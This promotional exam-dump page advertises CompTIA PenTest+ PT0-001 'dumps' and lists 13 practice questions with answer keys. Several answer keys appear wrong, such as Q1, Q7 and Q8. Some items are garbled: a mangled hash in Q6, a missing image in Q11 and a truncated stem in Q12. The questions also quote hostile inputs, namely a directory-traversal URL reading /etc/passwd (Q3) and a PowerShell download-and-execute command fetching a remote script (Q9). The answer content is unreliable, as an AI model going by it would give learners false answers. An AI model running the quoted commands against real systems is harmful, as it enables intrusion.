Exampass – unlimited lifetime access to IT training Exams and Certifications in PDF and Exam Engine formats, along with 1800+ other exams and updates

[2020.11] New CompTIA PT0-001 Dumps With VCE And PDF (Practice Questions) From Pass4itsure

Pass4itsure share these resources with you. Both VCE and PDF dumps contain the latest CompTIA PT0-001 exam questions, which will ensure your PT0-001 exam 100% passed! You can get PT0-001 VCE dumps and PT0-001 PDF dumps from Pass4itsure. Please get the latest Pass4itsure PT0-001 dumps here: https://www.pass4itsure.com/pt0-001.html (156 QA Dumps).

Download The Real CompTIA PT0-001 PDF Here, Free

[free pdf] CompTIA PT0-001 PDF [Drive] https://drive.google.com/file/d/1XQFrRVvf_A3FX7JaX0rNRtbXzFEJ6zGp/view?usp=sharing

CompTIA PT0-001 Practice Test Questions Answers

QUESTION 1
During testing, a critical vulnerability is discovered on a client\\’s core server. Which of the following should be the NEXT
action?
A. Disable the network port of the affected service.
B. Complete all findings and then submit them to the client.
C. Promptly alert the client with details of the finding.
D. Take the target offline so it cannot be exploited by an attacker.
Correct Answer: A


QUESTION 2
When performing compliance-based assessments, which of the following is the MOST important Key consideration?
A. Additional rate
B. Company policy
C. Impact tolerance
D. Industry type
Correct Answer: D


QUESTION 3
Given the following:
http://example.com/download.php?id-…/…/…/etc/passwd
Which of the following BEST describes the above attack?
A. Malicious file upload attack
B. Redirect attack
C. Directory traversal attack
D. Insecure direct object reference attack
Correct Answer: C

QUESTION 4
An assessor begins an internal security test of the Windows domain internal.comptia.net. The assessor is given network
access via DHCP but is not given any network maps or target IP addresses. Which of the following commands can the
assessor use to find any likely Windows domain controllers?
A. dig -q any _kerberos._tcp.internal.comptia.net
B. dig -q any _lanman._tcp.internal.comptia.net
C. dig -q any _ntlm._tcp.internal.comptia.net
D. dig -q any _smtp._tcp.internal.comptia.net
Correct Answer: A


QUESTION 5
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application
containers at once?
A. Common libraries
B. Configuration files
C. Sandbox escape
D. ASLR bypass
Correct Answer: A
Reference: https://www.stackrox.com/post/2019/02/the-runc-vulnerability-a-deep-dive-on-protecting-yourself/


QUESTION 6
If a security consultant comes across a password hash that resembles the following b117 525b3454
7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?
A. Kerberos
B. NetNTLMvl
C. NTLM
D. SHA-1
Correct Answer: D

QUESTION 7
A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should
Does the software developer perform?
A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan
Correct Answer: A

QUESTION 8
Which of the following has a direct and significant impact on the budget of the security assessment?
A. Scoping
B. Scheduling
C. Compliance requirement
D. Target risk
Correct Answer: D

QUESTION 9
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1″);Invoke-Cmdlet
Which of the following BEST describes the actions performed in this command?
A. Set the execution policy
B. Execute a remote script
C. Run an encoded command
D. Instantiate an object
Correct Answer: B

QUESTION 10
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Correct Answer: C


QUESTION 11
A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result
was the program outputting “True”.

exampass pt0-001 exam questions-q11\

Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose
two.)
A. Change fi\\’ to \\’Endlf
B. Remove the \\’let\\’ in front of \\’dest=5+5\\’.
C. Change the \\’=” to \\’-eq\\’.
D. Change -Source* and \\’dest\\’ to “Ssource” and “Sdest”
E. Change \\’else\\’ to \\’elif.
Correct Answer: BD

QUESTION 12
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability
A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the
latter host.
Correct Answer: B


QUESTION 13
A recently concluded penetration test revealed that a legacy web application is vulnerable to SQL injection. Research
indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are
not in a position to risk the availability of the application. Under such circumstances, which of the following controls are
low-effort, short-term solutions to minimize the SQL injection risk? (Choose two.)
A. Identify and eliminate inline SQL statements from the code.
B. Identify and eliminate dynamic SQL from stored procedures.
C. Identify and sanitize all user inputs.
D. Use a whitelist approach for SQL statements.
E. Use a blacklist approach for SQL statements.
F. Identify the source of malicious input and block the IP address.
Correct Answer: CD

Latest CompTIA PT0-001 Exam Video

Pass4itsure Discount Code 2020

Pass4itsure discount code 2020

P.S

Exampass shares all the resources: Latest CompTIA PT0-001 practice questions, latest PT0-001 pdf dumps, PT0-001 exam video learning. CompTIA PT0-001 dumps https://www.pass4itsure.com/pt0-001.html has come to help you prepare for the implementation of the CompTIA PT0-001 exam and its comprehensive and thorough PT0-001 exam practice materials, which will help you successfully pass the examination.